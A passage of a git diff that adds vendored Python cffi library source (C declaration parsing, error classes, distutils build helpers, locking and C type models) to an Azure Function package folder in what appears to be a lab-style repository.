'packed': pack, + 'dllexport': dllexport} + self._internal_parse(csource) + finally: + self._options = prev_options + + def _internal_parse(self, csource): + ast, macros, csource = self._parse(csource) + # add the macros + self._process_macros(macros) + # find the first "__dotdotdot__" and use that as a separator + # between the repeated typedefs and the real csource + iterator = iter(ast.ext) + for decl in iterator: + if decl.name == '__dotdotdot__': + break + else: + assert 0 + current_decl = None + # + try: + self._inside_extern_python = '__cffi_extern_python_stop' + for decl in iterator: + current_decl = decl + if isinstance(decl, pycparser.c_ast.Decl): + self._parse_decl(decl) + elif isinstance(decl, pycparser.c_ast.Typedef): + if not decl.name: + raise CDefError("typedef does not declare any name", + decl) + quals = 0 + if (isinstance(decl.type.type, pycparser.c_ast.IdentifierType) and + decl.type.type.names[-1].startswith('__dotdotdot')): + realtype = self._get_unknown_type(decl) + elif (isinstance(decl.type, pycparser.c_ast.PtrDecl) and + isinstance(decl.type.type, pycparser.c_ast.TypeDecl) and + isinstance(decl.type.type.type, + pycparser.c_ast.IdentifierType) and + decl.type.type.type.names[-1].startswith('__dotdotdot')): + realtype = self._get_unknown_ptr_type(decl) + else: + realtype, quals = self._get_type_and_quals( + decl.type, name=decl.name, partial_length_ok=True, + typedef_example="*(%s *)0" % (decl.name,)) + self._declare('typedef ' + decl.name, realtype, quals=quals) + elif decl.__class__.__name__ == 'Pragma': + pass # skip pragma, only in pycparser 2.15 + else: + raise CDefError("unexpected <%s>: this construct is valid " + "C but not valid in cdef()" % + decl.__class__.__name__, decl) + except CDefError as e: + if len(e.args) == 1: + e.args = e.args + (current_decl,) + raise + except FFIError as e: + msg = self._convert_pycparser_error(e, csource) + if msg: + e.args = (e.args[0] + "\n *** Err: %s" % msg,) + raise + + def _add_constants(self, key, val): + if key in self._int_constants: + if self._int_constants[key] == val: + return # ignore identical double declarations + raise FFIError( + "multiple declarations of constant: %s" % (key,)) + self._int_constants[key] = val + + def _add_integer_constant(self, name, int_str): + int_str = int_str.lower().rstrip("ul") + neg = int_str.startswith('-') + if neg: + int_str = int_str[1:] + # "010" is not valid oct in py3 + if (int_str.startswith("0") and int_str != '0' + and not int_str.startswith("0x")): + int_str = "0o" + int_str[1:] + pyvalue = int(int_str, 0) + if neg: + pyvalue = -pyvalue + self._add_constants(name, pyvalue) + self._declare('macro ' + name, pyvalue) + + def _process_macros(self, macros): + for key, value in macros.items(): + value = value.strip() + if _r_int_literal.match(value): + self._add_integer_constant(key, value) + elif value == '...': + self._declare('macro ' + key, value) + else: + raise CDefError( + 'only supports one of the following syntax:\n' + ' #define %s ... (literally dot-dot-dot)\n' + ' #define %s NUMBER (with NUMBER an integer' + ' constant, decimal/hex/octal)\n' + 'got:\n' + ' #define %s %s' + % (key, key, key, value)) + + def _declare_function(self, tp, quals, decl): + tp = self._get_type_pointer(tp, quals) + if self._options.get('dllexport'): + tag = 'dllexport_python ' + elif self._inside_extern_python == '__cffi_extern_python_start': + tag = 'extern_python ' + elif self._inside_extern_python == '__cffi_extern_python_plus_c_start': + tag = 'extern_python_plus_c ' + else: + tag = 'function ' + self._declare(tag + decl.name, tp) + + def _parse_decl(self, decl): + node = decl.type + if isinstance(node, pycparser.c_ast.FuncDecl): + tp, quals = self._get_type_and_quals(node, name=decl.name) + assert isinstance(tp, model.RawFunctionType) + self._declare_function(tp, quals, decl) + else: + if isinstance(node, pycparser.c_ast.Struct): + self._get_struct_union_enum_type('struct', node) + elif isinstance(node, pycparser.c_ast.Union): + self._get_struct_union_enum_type('union', node) + elif isinstance(node, pycparser.c_ast.Enum): + self._get_struct_union_enum_type('enum', node) + elif not decl.name: + raise CDefError("construct does not declare any variable", + decl) + # + if decl.name: + tp, quals = self._get_type_and_quals(node, + partial_length_ok=True) + if tp.is_raw_function: + self._declare_function(tp, quals, decl) + elif (tp.is_integer_type() and + hasattr(decl, 'init') and + hasattr(decl.init, 'value') and + _r_int_literal.match(decl.init.value)): + self._add_integer_constant(decl.name, decl.init.value) + elif (tp.is_integer_type() and + isinstance(decl.init, pycparser.c_ast.UnaryOp) and + decl.init.op == '-' and + hasattr(decl.init.expr, 'value') and + _r_int_literal.match(decl.init.expr.value)): + self._add_integer_constant(decl.name, + '-' + decl.init.expr.value) + elif (tp is model.void_type and + decl.name.startswith('__cffi_extern_python_')): + # hack: `extern "Python"` in the C source is replaced + # with "void __cffi_extern_python_start;" and + # "void __cffi_extern_python_stop;" + self._inside_extern_python = decl.name + else: + if self._inside_extern_python !='__cffi_extern_python_stop': + raise CDefError( + "cannot declare constants or " + "variables with 'extern \"Python\"'") + if (quals & model.Q_CONST) and not tp.is_array_type: + self._declare('constant ' + decl.name, tp, quals=quals) + else: + _warn_for_non_extern_non_static_global_variable(decl) + self._declare('variable ' + decl.name, tp, quals=quals) + + def parse_type(self, cdecl): + return self.parse_type_and_quals(cdecl)[0] + + def parse_type_and_quals(self, cdecl): + ast, macros = self._parse('void __dummy(\n%s\n);' % cdecl)[:2] + assert not macros + exprnode = ast.ext[-1].type.args.params[0] + if isinstance(exprnode, pycparser.c_ast.ID): + raise CDefError("unknown identifier '%s'" % (exprnode.name,)) + return self._get_type_and_quals(exprnode.type) + + def _declare(self, name, obj, included=False, quals=0): + if name in self._declarations: + prevobj, prevquals = self._declarations[name] + if prevobj is obj and prevquals == quals: + return + if not self._options.get('override'): + raise FFIError( + "multiple declarations of %s (for interactive usage, " + "try cdef(xx, override=True))" % (name,)) + assert '__dotdotdot__' not in name.split() + self._declarations[name] = (obj, quals) + if included: + self._included_declarations.add(obj) + + def _extract_quals(self, type): + quals = 0 + if isinstance(type, (pycparser.c_ast.TypeDecl, + pycparser.c_ast.PtrDecl)): + if 'const' in type.quals: + quals |= model.Q_CONST + if 'volatile' in type.quals: + quals |= model.Q_VOLATILE + if 'restrict' in type.quals: + quals |= model.Q_RESTRICT + return quals + + def _get_type_pointer(self, type, quals, declname=None): + if isinstance(type, model.RawFunctionType): + return type.as_function_pointer() + if (isinstance(type, model.StructOrUnionOrEnum) and + type.name.startswith('$') and type.name[1:].isdigit() and + type.forcename is None and declname is not None): + return model.NamedPointerType(type, declname, quals) + return model.PointerType(type, quals) + + def _get_type_and_quals(self, typenode, name=None, partial_length_ok=False, + typedef_example=None): + # first, dereference typedefs, if we have it already parsed, we're good + if (isinstance(typenode, pycparser.c_ast.TypeDecl) and + isinstance(typenode.type, pycparser.c_ast.IdentifierType) and + len(typenode.type.names) == 1 and + ('typedef ' + typenode.type.names[0]) in self._declarations): + tp, quals = self._declarations['typedef ' + typenode.type.names[0]] + quals |= self._extract_quals(typenode) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.ArrayDecl): + # array type + if typenode.dim is None: + length = None + else: + length = self._parse_constant( + typenode.dim, partial_length_ok=partial_length_ok) + # a hack: in 'typedef int foo_t[...][...];', don't use '...' as + # the length but use directly the C expression that would be + # generated by recompiler.py. This lets the typedef be used in + # many more places within recompiler.py + if typedef_example is not None: + if length == '...': + length = '_cffi_array_len(%s)' % (typedef_example,) + typedef_example = "*" + typedef_example + # + tp, quals = self._get_type_and_quals(typenode.type, + partial_length_ok=partial_length_ok, + typedef_example=typedef_example) + return model.ArrayType(tp, length), quals + # + if isinstance(typenode, pycparser.c_ast.PtrDecl): + # pointer type + itemtype, itemquals = self._get_type_and_quals(typenode.type) + tp = self._get_type_pointer(itemtype, itemquals, declname=name) + quals = self._extract_quals(typenode) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.TypeDecl): + quals = self._extract_quals(typenode) + type = typenode.type + if isinstance(type, pycparser.c_ast.IdentifierType): + # assume a primitive type. get it from .names, but reduce + # synonyms to a single chosen combination + names = list(type.names) + if names != ['signed', 'char']: # keep this unmodified + prefixes = {} + while names: + name = names[0] + if name in ('short', 'long', 'signed', 'unsigned'): + prefixes[name] = prefixes.get(name, 0) + 1 + del names[0] + else: + break + # ignore the 'signed' prefix below, and reorder the others + newnames = [] + for prefix in ('unsigned', 'short', 'long'): + for i in range(prefixes.get(prefix, 0)): + newnames.append(prefix) + if not names: + names = ['int'] # implicitly + if names == ['int']: # but kill it if 'short' or 'long' + if 'short' in prefixes or 'long' in prefixes: + names = [] + names = newnames + names + ident = ' '.join(names) + if ident == 'void': + return model.void_type, quals + if ident == '__dotdotdot__': + raise FFIError(':%d: bad usage of "..."' % + typenode.coord.line) + tp0, quals0 = resolve_common_type(self, ident) + return tp0, (quals | quals0) + # + if isinstance(type, pycparser.c_ast.Struct): + # 'struct foobar' + tp = self._get_struct_union_enum_type('struct', type, name) + return tp, quals + # + if isinstance(type, pycparser.c_ast.Union): + # 'union foobar' + tp = self._get_struct_union_enum_type('union', type, name) + return tp, quals + # + if isinstance(type, pycparser.c_ast.Enum): + # 'enum foobar' + tp = self._get_struct_union_enum_type('enum', type, name) + return tp, quals + # + if isinstance(typenode, pycparser.c_ast.FuncDecl): + # a function type + return self._parse_function_type(typenode, name), 0 + # + # nested anonymous structs or unions end up here + if isinstance(typenode, pycparser.c_ast.Struct): + return self._get_struct_union_enum_type('struct', typenode, name, + nested=True), 0 + if isinstance(typenode, pycparser.c_ast.Union): + return self._get_struct_union_enum_type('union', typenode, name, + nested=True), 0 + # + raise FFIError(":%d: bad or unsupported type declaration" % + typenode.coord.line) + + def _parse_function_type(self, typenode, funcname=None): + params = list(getattr(typenode.args, 'params', [])) + for i, arg in enumerate(params): + if not hasattr(arg, 'type'): + raise CDefError("%s arg %d: unknown type '%s'" + " (if you meant to use the old C syntax of giving" + " untyped arguments, it is not supported)" + % (funcname or 'in expression', i + 1, + getattr(arg, 'name', '?'))) + ellipsis = ( + len(params) > 0 and + isinstance(params[-1].type, pycparser.c_ast.TypeDecl) and + isinstance(params[-1].type.type, + pycparser.c_ast.IdentifierType) and + params[-1].type.type.names == ['__dotdotdot__']) + if ellipsis: + params.pop() + if not params: + raise CDefError( + "%s: a function with only '(...)' as argument" + " is not correct C" % (funcname or 'in expression')) + args = [self._as_func_arg(*self._get_type_and_quals(argdeclnode.type)) + for argdeclnode in params] + if not ellipsis and args == [model.void_type]: + args = [] + result, quals = self._get_type_and_quals(typenode.type) + # the 'quals' on the result type are ignored. HACK: we absure them + # to detect __stdcall functions: we textually replace "__stdcall" + # with "volatile volatile const" above. + abi = None + if hasattr(typenode.type, 'quals'): # else, probable syntax error anyway + if typenode.type.quals[-3:] == ['volatile', 'volatile', 'const']: + abi = '__stdcall' + return model.RawFunctionType(tuple(args), result, ellipsis, abi) + + def _as_func_arg(self, type, quals): + if isinstance(type, model.ArrayType): + return model.PointerType(type.item, quals) + elif isinstance(type, model.RawFunctionType): + return type.as_function_pointer() + else: + return type + + def _get_struct_union_enum_type(self, kind, type, name=None, nested=False): + # First, a level of caching on the exact 'type' node of the AST. + # This is obscure, but needed because pycparser "unrolls" declarations + # such as "typedef struct { } foo_t, *foo_p" and we end up with + # an AST that is not a tree, but a DAG, with the "type" node of the + # two branches foo_t and foo_p of the trees being the same node. + # It's a bit silly but detecting "DAG-ness" in the AST tree seems + # to be the only way to distinguish this case from two independent + # structs. See test_struct_with_two_usages. + try: + return self._structnode2type[type] + except KeyError: + pass + # + # Note that this must handle parsing "struct foo" any number of + # times and always return the same StructType object. Additionally, + # one of these times (not necessarily the first), the fields of + # the struct can be specified with "struct foo { ...fields... }". + # If no name is given, then we have to create a new anonymous struct + # with no caching; in this case, the fields are either specified + # right now or never. + # + force_name = name + name = type.name + # + # get the type or create it if needed + if name is None: + # 'force_name' is used to guess a more readable name for + # anonymous structs, for the common case "typedef struct { } foo". + if force_name is not None: + explicit_name = '$%s' % force_name + else: + self._anonymous_counter += 1 + explicit_name = '$%d' % self._anonymous_counter + tp = None + else: + explicit_name = name + key = '%s %s' % (kind, name) + tp, _ = self._declarations.get(key, (None, None)) + # + if tp is None: + if kind == 'struct': + tp = model.StructType(explicit_name, None, None, None) + elif kind == 'union': + tp = model.UnionType(explicit_name, None, None, None) + elif kind == 'enum': + if explicit_name == '__dotdotdot__': + raise CDefError("Enums cannot be declared with ...") + tp = self._build_enum_type(explicit_name, type.values) + else: + raise AssertionError("kind = %r" % (kind,)) + if name is not None: + self._declare(key, tp) + else: + if kind == 'enum' and type.values is not None: + raise NotImplementedError( + "enum %s: the '{}' declaration should appear on the first " + "time the enum is mentioned, not later" % explicit_name) + if not tp.forcename: + tp.force_the_name(force_name) + if tp.forcename and '$' in tp.name: + self._declare('anonymous %s' % tp.forcename, tp) + # + self._structnode2type[type] = tp + # + # enums: done here + if kind == 'enum': + return tp + # + # is there a 'type.decls'? If yes, then this is the place in the + # C sources that declare the fields. If no, then just return the + # existing type, possibly still incomplete. + if type.decls is None: + return tp + # + if tp.fldnames is not None: + raise CDefError("duplicate declaration of struct %s" % name) + fldnames = [] + fldtypes = [] + fldbitsize = [] + fldquals = [] + for decl in type.decls: + if (isinstance(decl.type, pycparser.c_ast.IdentifierType) and + ''.join(decl.type.names) == '__dotdotdot__'): + # XXX pycparser is inconsistent: 'names' should be a list + # of strings, but is sometimes just one string. Use + # str.join() as a way to cope with both. + self._make_partial(tp, nested) + continue + if decl.bitsize is None: + bitsize = -1 + else: + bitsize = self._parse_constant(decl.bitsize) + self._partial_length = False + type, fqual = self._get_type_and_quals(decl.type, + partial_length_ok=True) + if self._partial_length: + self._make_partial(tp, nested) + if isinstance(type, model.StructType) and type.partial: + self._make_partial(tp, nested) + fldnames.append(decl.name or '') + fldtypes.append(type) + fldbitsize.append(bitsize) + fldquals.append(fqual) + tp.fldnames = tuple(fldnames) + tp.fldtypes = tuple(fldtypes) + tp.fldbitsize = tuple(fldbitsize) + tp.fldquals = tuple(fldquals) + if fldbitsize != [-1] * len(fldbitsize): + if isinstance(tp, model.StructType) and tp.partial: + raise NotImplementedError("%s: using both bitfields and '...;'" + % (tp,)) + tp.packed = self._options.get('packed') + if tp.completed: # must be re-completed: it is not opaque any more + tp.completed = 0 + self._recomplete.append(tp) + return tp + + def _make_partial(self, tp, nested): + if not isinstance(tp, model.StructOrUnion): + raise CDefError("%s cannot be partial" % (tp,)) + if not tp.has_c_name() and not nested: + raise NotImplementedError("%s is partial but has no C name" %(tp,)) + tp.partial = True + + def _parse_constant(self, exprnode, partial_length_ok=False): + # for now, limited to expressions that are an immediate number + # or positive/negative number + if isinstance(exprnode, pycparser.c_ast.Constant): + s = exprnode.value + if '0' <= s[0] <= '9': + s = s.rstrip('uUlL') + try: + if s.startswith('0'): + return int(s, 8) + else: + return int(s, 10) + except ValueError: + if len(s) > 1: + if s.lower()[0:2] == '0x': + return int(s, 16) + elif s.lower()[0:2] == '0b': + return int(s, 2) + raise CDefError("invalid constant %r" % (s,)) + elif s[0] == "'" and s[-1] == "'" and ( + len(s) == 3 or (len(s) == 4 and s[1] == "\\")): + return ord(s[-2]) + else: + raise CDefError("invalid constant %r" % (s,)) + # + if (isinstance(exprnode, pycparser.c_ast.UnaryOp) and + exprnode.op == '+'): + return self._parse_constant(exprnode.expr) + # + if (isinstance(exprnode, pycparser.c_ast.UnaryOp) and + exprnode.op == '-'): + return -self._parse_constant(exprnode.expr) + # load previously defined int constant + if (isinstance(exprnode, pycparser.c_ast.ID) and + exprnode.name in self._int_constants): + return self._int_constants[exprnode.name] + # + if (isinstance(exprnode, pycparser.c_ast.ID) and + exprnode.name == '__dotdotdotarray__'): + if partial_length_ok: + self._partial_length = True + return '...' + raise FFIError(":%d: unsupported '[...]' here, cannot derive " + "the actual array length in this context" + % exprnode.coord.line) + # + if isinstance(exprnode, pycparser.c_ast.BinaryOp): + left = self._parse_constant(exprnode.left) + right = self._parse_constant(exprnode.right) + if exprnode.op == '+': + return left + right + elif exprnode.op == '-': + return left - right + elif exprnode.op == '*': + return left * right + elif exprnode.op == '/': + return self._c_div(left, right) + elif exprnode.op == '%': + return left - self._c_div(left, right) * right + elif exprnode.op == '<<': + return left << right + elif exprnode.op == '>>': + return left >> right + elif exprnode.op == '&': + return left & right + elif exprnode.op == '|': + return left | right + elif exprnode.op == '^': + return left ^ right + # + raise FFIError(":%d: unsupported expression: expected a " + "simple numeric constant" % exprnode.coord.line) + + def _c_div(self, a, b): + result = a // b + if ((a < 0) ^ (b < 0)) and (a % b) != 0: + result += 1 + return result + + def _build_enum_type(self, explicit_name, decls): + if decls is not None: + partial = False + enumerators = [] + enumvalues = [] + nextenumvalue = 0 + for enum in decls.enumerators: + if _r_enum_dotdotdot.match(enum.name): + partial = True + continue + if enum.value is not None: + nextenumvalue = self._parse_constant(enum.value) + enumerators.append(enum.name) + enumvalues.append(nextenumvalue) + self._add_constants(enum.name, nextenumvalue) + nextenumvalue += 1 + enumerators = tuple(enumerators) + enumvalues = tuple(enumvalues) + tp = model.EnumType(explicit_name, enumerators, enumvalues) + tp.partial = partial + else: # opaque enum + tp = model.EnumType(explicit_name, (), ()) + return tp + + def include(self, other): + for name, (tp, quals) in other._declarations.items(): + if name.startswith('anonymous $enum_$'): + continue # fix for test_anonymous_enum_include + kind = name.split(' ', 1)[0] + if kind in ('struct', 'union', 'enum', 'anonymous', 'typedef'): + self._declare(name, tp, included=True, quals=quals) + for k, v in other._int_constants.items(): + self._add_constants(k, v) + + def _get_unknown_type(self, decl): + typenames = decl.type.type.names + if typenames == ['__dotdotdot__']: + return model.unknown_type(decl.name) + + if typenames == ['__dotdotdotint__']: + if self._uses_new_feature is None: + self._uses_new_feature = "'typedef int... %s'" % decl.name + return model.UnknownIntegerType(decl.name) + + if typenames == ['__dotdotdotfloat__']: + # note: not for 'long double' so far + if self._uses_new_feature is None: + self._uses_new_feature = "'typedef float... %s'" % decl.name + return model.UnknownFloatType(decl.name) + + raise FFIError(':%d: unsupported usage of "..." in typedef' + % decl.coord.line) + + def _get_unknown_ptr_type(self, decl): + if decl.type.type.type.names == ['__dotdotdot__']: + return model.unknown_ptr_type(decl.name) + raise FFIError(':%d: unsupported usage of "..." in typedef' + % decl.coord.line) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py new file mode 100644 index 0000000..0f8f406 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/error.py @@ -0,0 +1,31 @@ + +class FFIError(Exception): + __module__ = 'cffi' + +class CDefError(Exception): + __module__ = 'cffi' + def __str__(self): + try: + current_decl = self.args[1] + filename = current_decl.coord.file + linenum = current_decl.coord.line + prefix = '%s:%d: ' % (filename, linenum) + except (AttributeError, TypeError, IndexError): + prefix = '' + return '%s%s' % (prefix, self.args[0]) + +class VerificationError(Exception): + """ An error raised when verification fails + """ + __module__ = 'cffi' + +class VerificationMissing(Exception): + """ An error raised when incomplete structures are passed into + cdef, but no verification has been done + """ + __module__ = 'cffi' + +class PkgConfigError(Exception): + """ An error raised for missing modules in pkg-config + """ + __module__ = 'cffi' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py new file mode 100644 index 0000000..0feab6e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/ffiplatform.py @@ -0,0 +1,127 @@ +import sys, os +from .error import VerificationError + + +LIST_OF_FILE_NAMES = ['sources', 'include_dirs', 'library_dirs', + 'extra_objects', 'depends'] + +def get_extension(srcfilename, modname, sources=(), **kwds): + _hack_at_distutils() + from distutils.core import Extension + allsources = [srcfilename] + for src in sources: + allsources.append(os.path.normpath(src)) + return Extension(name=modname, sources=allsources, **kwds) + +def compile(tmpdir, ext, compiler_verbose=0, debug=None): + """Compile a C extension module using distutils.""" + + _hack_at_distutils() + saved_environ = os.environ.copy() + try: + outputfilename = _build(tmpdir, ext, compiler_verbose, debug) + outputfilename = os.path.abspath(outputfilename) + finally: + # workaround for a distutils bugs where some env vars can + # become longer and longer every time it is used + for key, value in saved_environ.items(): + if os.environ.get(key) != value: + os.environ[key] = value + return outputfilename + +def _build(tmpdir, ext, compiler_verbose=0, debug=None): + # XXX compact but horrible :-( + from distutils.core import Distribution + import distutils.errors, distutils.log + # + dist = Distribution({'ext_modules': [ext]}) + dist.parse_config_files() + options = dist.get_option_dict('build_ext') + if debug is None: + debug = sys.flags.debug + options['debug'] = ('ffiplatform', debug) + options['force'] = ('ffiplatform', True) + options['build_lib'] = ('ffiplatform', tmpdir) + options['build_temp'] = ('ffiplatform', tmpdir) + # + try: + old_level = distutils.log.set_threshold(0) or 0 + try: + distutils.log.set_verbosity(compiler_verbose) + dist.run_command('build_ext') + cmd_obj = dist.get_command_obj('build_ext') + [soname] = cmd_obj.get_outputs() + finally: + distutils.log.set_threshold(old_level) + except (distutils.errors.CompileError, + distutils.errors.LinkError) as e: + raise VerificationError('%s: %s' % (e.__class__.__name__, e)) + # + return soname + +try: + from os.path import samefile +except ImportError: + def samefile(f1, f2): + return os.path.abspath(f1) == os.path.abspath(f2) + +def maybe_relative_path(path): + if not os.path.isabs(path): + return path # already relative + dir = path + names = [] + while True: + prevdir = dir + dir, name = os.path.split(prevdir) + if dir == prevdir or not dir: + return path # failed to make it relative + names.append(name) + try: + if samefile(dir, os.curdir): + names.reverse() + return os.path.join(*names) + except OSError: + pass + +# ____________________________________________________________ + +try: + int_or_long = (int, long) + import cStringIO +except NameError: + int_or_long = int # Python 3 + import io as cStringIO + +def _flatten(x, f): + if isinstance(x, str): + f.write('%ds%s' % (len(x), x)) + elif isinstance(x, dict): + keys = sorted(x.keys()) + f.write('%dd' % len(keys)) + for key in keys: + _flatten(key, f) + _flatten(x[key], f) + elif isinstance(x, (list, tuple)): + f.write('%dl' % len(x)) + for value in x: + _flatten(value, f) + elif isinstance(x, int_or_long): + f.write('%di' % (x,)) + else: + raise TypeError( + "the keywords to verify() contains unsupported object %r" % (x,)) + +def flatten(x): + f = cStringIO.StringIO() + _flatten(x, f) + return f.getvalue() + +def _hack_at_distutils(): + # Windows-only workaround for some configurations: see + # https://bugs.python.org/issue23246 (Python 2.7 with + # a specific MS compiler suite download) + if sys.platform == "win32": + try: + import setuptools # for side-effects, patches distutils + except ImportError: + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py new file mode 100644 index 0000000..2e40ed8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/lock.py @@ -0,0 +1,30 @@ +import sys + +if sys.version_info < (3,): + try: + from thread import allocate_lock + except ImportError: + from dummy_thread import allocate_lock +else: + try: + from _thread import allocate_lock + except ImportError: + from _dummy_thread import allocate_lock + + +##import sys +##l1 = allocate_lock + +##class allocate_lock(object): +## def __init__(self): +## self._real = l1() +## def __enter__(self): +## for i in range(4, 0, -1): +## print sys._getframe(i).f_code +## print +## return self._real.__enter__() +## def __exit__(self, *args): +## return self._real.__exit__(*args) +## def acquire(self, f): +## assert f is False +## return self._real.acquire(f) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py new file mode 100644 index 0000000..065e8c0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/model.py @@ -0,0 +1,617 @@ +import types +import weakref + +from .lock import allocate_lock +from .error import CDefError, VerificationError, VerificationMissing + +# type qualifiers +Q_CONST = 0x01 +Q_RESTRICT = 0x02 +Q_VOLATILE = 0x04 + +def qualify(quals, replace_with): + if quals & Q_CONST: + replace_with = ' const ' + replace_with.lstrip() + if quals & Q_VOLATILE: + replace_with = ' volatile ' + replace_with.lstrip() + if quals & Q_RESTRICT: + # It seems that __restrict is supported by gcc and msvc. + # If you hit some different compiler, add a #define in + # _cffi_include.h for it (and in its copies, documented there) + replace_with = ' __restrict ' + replace_with.lstrip() + return replace_with + + +class BaseTypeByIdentity(object): + is_array_type = False + is_raw_function = False + + def get_c_name(self, replace_with='', context='a C file', quals=0): + result = self.c_name_with_marker + assert result.count('&') == 1 + # some logic duplication with ffi.getctype()... :-( + replace_with = replace_with.strip() + if replace_with: + if replace_with.startswith('*') and '&[' in result: + replace_with = '(%s)' % replace_with + elif not replace_with[0] in '[(': + replace_with = ' ' + replace_with + replace_with = qualify(quals, replace_with) + result = result.replace('&', replace_with) + if '$' in result: + raise VerificationError( + "cannot generate '%s' in %s: unknown type name" + % (self._get_c_name(), context)) + return result + + def _get_c_name(self): + return self.c_name_with_marker.replace('&', '') + + def has_c_name(self): + return '$' not in self._get_c_name() + + def is_integer_type(self): + return False + + def get_cached_btype(self, ffi, finishlist, can_delay=False): + try: + BType = ffi._cached_btypes[self] + except KeyError: + BType = self.build_backend_type(ffi, finishlist) + BType2 = ffi._cached_btypes.setdefault(self, BType) + assert BType2 is BType + return BType + + def __repr__(self): + return '<%s>' % (self._get_c_name(),) + + def _get_items(self): + return [(name, getattr(self, name)) for name in self._attrs_] + + +class BaseType(BaseTypeByIdentity): + + def __eq__(self, other): + return (self.__class__ == other.__class__ and + self._get_items() == other._get_items()) + + def __ne__(self, other): + return not self == other + + def __hash__(self): + return hash((self.__class__, tuple(self._get_items()))) + + +class VoidType(BaseType): + _attrs_ = () + + def __init__(self): + self.c_name_with_marker = 'void&' + + def build_backend_type(self, ffi, finishlist): + return global_cache(self, ffi, 'new_void_type') + +void_type = VoidType() + + +class BasePrimitiveType(BaseType): + def is_complex_type(self): + return False + + +class PrimitiveType(BasePrimitiveType): + _attrs_ = ('name',) + + ALL_PRIMITIVE_TYPES = { + 'char': 'c', + 'short': 'i', + 'int': 'i', + 'long': 'i', + 'long long': 'i', + 'signed char': 'i', + 'unsigned char': 'i', + 'unsigned short': 'i', + 'unsigned int': 'i', + 'unsigned long': 'i', + 'unsigned long long': 'i', + 'float': 'f', + 'double': 'f', + 'long double': 'f', + 'float _Complex': 'j', + 'double _Complex': 'j', + '_Bool': 'i', + # the following types are not primitive in the C sense + 'wchar_t': 'c', + 'char16_t': 'c', + 'char32_t': 'c', + 'int8_t': 'i', + 'uint8_t': 'i', + 'int16_t': 'i', + 'uint16_t': 'i', + 'int32_t': 'i', + 'uint32_t': 'i', + 'int64_t': 'i', + 'uint64_t': 'i', + 'int_least8_t': 'i', + 'uint_least8_t': 'i', + 'int_least16_t': 'i', + 'uint_least16_t': 'i', + 'int_least32_t': 'i', + 'uint_least32_t': 'i', + 'int_least64_t': 'i', + 'uint_least64_t': 'i', + 'int_fast8_t': 'i', + 'uint_fast8_t': 'i', + 'int_fast16_t': 'i', + 'uint_fast16_t': 'i', + 'int_fast32_t': 'i', + 'uint_fast32_t': 'i', + 'int_fast64_t': 'i', + 'uint_fast64_t': 'i', + 'intptr_t': 'i', + 'uintptr_t': 'i', + 'intmax_t': 'i', + 'uintmax_t': 'i', + 'ptrdiff_t': 'i', + 'size_t': 'i', + 'ssize_t': 'i', + } + + def __init__(self, name): + assert name in self.ALL_PRIMITIVE_TYPES + self.name = name + self.c_name_with_marker = name + '&' + + def is_char_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'c' + def is_integer_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'i' + def is_float_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'f' + def is_complex_type(self): + return self.ALL_PRIMITIVE_TYPES[self.name] == 'j' + + def build_backend_type(self, ffi, finishlist): + return global_cache(self, ffi, 'new_primitive_type', self.name) + + +class UnknownIntegerType(BasePrimitiveType): + _attrs_ = ('name',) + + def __init__(self, name): + self.name = name + self.c_name_with_marker = name + '&' + + def is_integer_type(self): + return True + + def build_backend_type(self, ffi, finishlist): + raise NotImplementedError("integer type '%s' can only be used after " + "compilation" % self.name) + +class UnknownFloatType(BasePrimitiveType): + _attrs_ = ('name', ) + + def __init__(self, name): + self.name = name + self.c_name_with_marker = name + '&' + + def build_backend_type(self, ffi, finishlist): + raise NotImplementedError("float type '%s' can only be used after " + "compilation" % self.name) + + +class BaseFunctionType(BaseType): + _attrs_ = ('args', 'result', 'ellipsis', 'abi') + + def __init__(self, args, result, ellipsis, abi=None): + self.args = args + self.result = result + self.ellipsis = ellipsis + self.abi = abi + # + reprargs = [arg._get_c_name() for arg in self.args] + if self.ellipsis: + reprargs.append('...') + reprargs = reprargs or ['void'] + replace_with = self._base_pattern % (', '.join(reprargs),) + if abi is not None: + replace_with = replace_with[:1] + abi + ' ' + replace_with[1:] + self.c_name_with_marker = ( + self.result.c_name_with_marker.replace('&', replace_with)) + + +class RawFunctionType(BaseFunctionType): + # Corresponds to a C type like 'int(int)', which is the C type of + # a function, but not a pointer-to-function. The backend has no + # notion of such a type; it's used temporarily by parsing. + _base_pattern = '(&)(%s)' + is_raw_function = True + + def build_backend_type(self, ffi, finishlist): + raise CDefError("cannot render the type %r: it is a function " + "type, not a pointer-to-function type" % (self,)) + + def as_function_pointer(self): + return FunctionPtrType(self.args, self.result, self.ellipsis, self.abi) + + +class FunctionPtrType(BaseFunctionType): + _base_pattern = '(*&)(%s)' + + def build_backend_type(self, ffi, finishlist): + result = self.result.get_cached_btype(ffi, finishlist) + args = [] + for tp in self.args: + args.append(tp.get_cached_btype(ffi, finishlist)) + abi_args = () + if self.abi == "__stdcall": + if not self.ellipsis: # __stdcall ignored for variadic funcs + try: + abi_args = (ffi._backend.FFI_STDCALL,) + except AttributeError: + pass + return global_cache(self, ffi, 'new_function_type', + tuple(args), result, self.ellipsis, *abi_args) + + def as_raw_function(self): + return RawFunctionType(self.args, self.result, self.ellipsis, self.abi) + + +class PointerType(BaseType): + _attrs_ = ('totype', 'quals') + + def __init__(self, totype, quals=0): + self.totype = totype + self.quals = quals + extra = qualify(quals, " *&") + if totype.is_array_type: + extra = 